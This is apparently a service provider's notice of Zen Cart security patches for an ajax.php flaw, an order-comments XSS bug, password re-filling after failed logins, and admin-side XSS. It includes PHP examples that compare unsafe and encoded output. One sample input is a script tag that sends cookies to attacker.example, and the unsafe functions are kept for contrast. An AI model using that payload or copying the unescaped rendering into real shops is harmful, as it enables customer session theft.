Zen Cart 11-26-2015 Security Patches
This patch is for Zen Cart 1.3.X - 1.5.4.
We will apply the following patches as needed for your version. Please note that extensive customization of the affected files could incur additional cost, which would be disclosed before you are billed.
1. Problem with /ajax.php in v1.5.4 only - Severity: High
In Zen Cart v1.5.4 the /ajax.php file contains a vulnerability that, under very specific conditions, can be exploited against the server.
The patch is simple: replace the /ajax.php file.
Below are additional lower-severity patches affecting prior versions as well as 1.5.4. Review each one carefully for your site so the change can be merged with any customizations you have made to the affected files:
2. XSS problem for unsanitized comment field - Severity: Medium
In Zen Cart versions up to and including v1.5.4 an XSS problem exists with the order-comments field: text a customer types into the comments box is written back into the checkout confirmation page without being encoded for HTML output.
The fix is a simple one-line patch to /includes/modules/pages/checkout_confirmation/header_php.php.
The attached checkout_confirmation header_php.php is for v1.3.9 through v1.5.4 only. Older versions should be patched by merging the one-line change into the existing file by hand.
Patched file: /includes/modules/pages/checkout_confirmation/header_php.php
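The pattern behind this class of bug, shown as an added example rather than Zen Cart's own patch: the same constructed comments value is rendered once unescaped and once encoded for an HTML text context. The helper names here are illustrative; in Zen Cart the equivalent output-encoding function is zen_output_string_protected(), which wraps htmlspecialchars().

```php
<?php
// Added example, not code from the Zen Cart patch. Demonstrates why the
// order-comments field needed output encoding on checkout_confirmation.

function render_comments_unsafe(string $comments): string
{
    // Vulnerable: attacker-controlled text is placed straight into markup.
    return '<p class="comments">' . nl2br($comments) . '</p>';
}

function render_comments_safe(string $comments): string
{
    // Hardened: encode for an HTML text context before inserting.
    // ENT_QUOTES escapes < > & " ' so the browser treats the value as text.
    // nl2br runs after encoding so the <br /> it adds is kept as markup.
    return '<p class="comments">'
        . nl2br(htmlspecialchars($comments, ENT_QUOTES | ENT_HTML5, 'UTF-8'))
        . '</p>';
}

// Constructed sample input: what a hostile customer could type into the
// comments box during checkout.
$comments = "Leave at back door\n"
    . "<script>document.location='https://attacker.example/?c='+document.cookie</script>";

echo render_comments_unsafe($comments), PHP_EOL;
// The <script> element reaches the page intact and runs for whoever views it.

echo render_comments_safe($comments), PHP_EOL;
// The tag is emitted as &lt;script&gt;... and displays as plain text.

// Self-check: the encoded output must not contain a live tag.
assert(strpos(render_comments_safe($comments), '<script') === false);
```

The same value is also stored with the order, so it is shown again on the admin order screens; encoding belongs at every point of output, not only on the confirmation page.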
3. Failed customer login puts password back in input box - Severity: Low
When a login attempt fails because of an invalid password, the page returned after the failure re-populates the password box with the password that was just submitted, so the secret appears in the HTML response (and therefore in browser history, caches and any proxy that logs page bodies).
The fix is a one-line edit to /includes/functions/html_output.php, merged with any existing customizations of that file.
For v1.5.4 you can apply the attached html_output.php file to /includes/functions/html_output.php, or, if you have customized that file via plugins, use the above code-diff link to find the one line to change.
Thanks to Trustwave Security for alerting us to this issue.
Patched file: /includes/functions/html_output.php
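An added example, not Zen Cart's patched html_output.php: a stripped-down input-field builder modelled on the zen_draw_input_field() parameter order, with a $patched switch so the pre-fix and post-fix behaviour can be compared side by side. The $submitted array and the login values are constructed for the example.

```php
<?php
// Added example, not code from the Zen Cart patch. Shows why a failed
// login echoed the submitted password and how the redraw is made safe.

function draw_input_field(
    array $submitted,          // previously submitted form values (constructed stand-in for $GLOBALS)
    string $name,
    string $value = '',
    string $parameters = '',
    string $type = 'text',
    bool $reinsert_value = true,
    bool $patched = true
): string {
    $field = '<input type="' . htmlspecialchars($type, ENT_QUOTES, 'UTF-8')
        . '" name="' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '"';

    // Pre-patch: any previously submitted value for this name is written
    // back into the field, password included.
    // Patched: password fields are never refilled from submitted data.
    $reinsert_value = $reinsert_value && !($patched && $type === 'password');

    if ($reinsert_value && isset($submitted[$name])) {
        $field .= ' value="' . htmlspecialchars($submitted[$name], ENT_QUOTES, 'UTF-8') . '"';
    } elseif ($value !== '') {
        $field .= ' value="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '"';
    }
    if ($parameters !== '') {
        $field .= ' ' . $parameters;
    }
    return $field . ' />';
}

// Constructed sample: the form values from a login attempt that failed.
$post = ['email_address' => 'customer@example.com', 'password' => 'hunter2'];

// Re-filling the e-mail address is a convenience and stays as it was.
echo draw_input_field($post, 'email_address', '', '', 'text', true, false), PHP_EOL;

// Unpatched: the wrong password is written into the response.
echo draw_input_field($post, 'password', '', '', 'password', true, false), PHP_EOL;

// Patched: no value attribute is emitted for the password field.
echo draw_input_field($post, 'password', '', '', 'password', true, true), PHP_EOL;

assert(strpos(draw_input_field($post, 'password', '', '', 'password', true, true), 'hunter2') === false);
```

A password that was typed wrongly is frequently a typo of the real one, or the real password for another account, which is why it should never be reflected into a page even when the field is masked.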
4. XSS concerns on the Admin side, mitigated by the Admin area's CSRF protections - Severity: Low
Trustwave Security has reported that some fields on admin edit screens are at risk of XSS exploitation. A patch is being prepared, but it is important to note that none of these concerns can be exploited without a valid Admin login already in hand. The problem could therefore only be caused by a person who already has permission to access the admin area intentionally placing malicious code into the affected fields. Because the Zen Cart Admin area is already protected against CSRF, a third party cannot plant such a payload by tricking a logged-in administrator into submitting a forged form, which is why these XSS issues are rated Low.
A further announcement will be posted when the patch is ready.
There are core file edits and several new files. In order to complete this installation we will need both sets of credentials. Do not put these credentials in the checkout form or in email; we will send you a secure form to collect the necessary information.